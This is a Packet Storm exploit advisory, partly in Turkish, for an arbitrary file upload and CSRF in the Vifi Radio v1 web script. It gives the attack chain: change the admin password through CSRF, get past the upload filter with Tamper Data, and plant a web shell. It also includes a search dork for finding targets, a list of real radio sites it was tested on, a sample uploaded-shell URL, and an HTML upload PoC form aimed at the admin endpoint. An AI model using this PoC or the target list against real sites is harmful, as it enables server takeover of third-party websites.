Vifi Radio 1 Shell Upload / CSRF

2015-08-22T00:00:00
ID PACKETSTORM:133260
Type packetstorm
Reporter KnocKout
Modified 2015-08-22T00:00:00

Description

                                        
                                            ` .__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \  
| Y \/ ^ /> <\ \_/ \ | \/\ ___/  
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/  
_____________________________   
/ _____/\_ _____/\_ ___ \  
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com  
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/   
Vifi Radio v1 - Arbitrary File Upload Vulnerability with CSRF  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Discovered by: KnocKout  
[~] Contact : knockout@e-mail.com.tr  
[~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com  
[~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker,  
Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov  
############################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Vifi Radio  
|~Affected Version : v1  
|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html   
|~Official Demo : http://radyo.vifibilisim.com  
|~RISK : Medium  
|~DORK : inurl:index.asp?radyo=2  
|~Tested On : [L] Windows 7, Mozilla Firefox  
########################################################  
Tested on;  
http://radyo.vifibilisim.com  
www.radyoimza.com  
www.bayraklifm.com  
www.istanbulfm.net  
www.gaziantepfurkanradyo.com  
http://iskenderunfm.com  
----------------------------------------------------------  
BİLGİ :   
Scriptte daha önce keşfedilmiş olan CSRF Zaafiyeti Kullanarak Admin Şifresi değiştirilir ve panele giriş yapılır.  
Aşağıda verilen PoC kodlar, "Tamper Data" Eşliğinde Upload süzgecini bypass etmek için kullanıldığında zararlı yazılım doğrudan sunucuya yüklenebilir.  
Yüklenen Shell Dosyasının sunucudaki yerini "Tamper Data" zaten iletim esnasında yakalayacaktır.  
Alternatif olarak "Anasayfa" üzerinde aşağıda yer alan "Djler" bölümünden shell dosyasının izi sürülebilir.  
  
Example : http://radyo.vifibilisim.com/yonetim/djler/2082015121530.php  
  
----------------------------------------------------------  
Upload.HTML  
-----------------------------------------------------------  
  
<td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data" onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue">  
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">  
<tr>  
<td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td>  
</tr> <tr>  
<td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main">  
<input name="fmsubmit" type="submit" class="main" value="YÜKLE" /></td>  
  
</tr>  
</table>  
</form></td>  
</tr>  
</table></td>  
</tr>  
  
############################  
"Admin Panel: /yonetim "  
############################  
`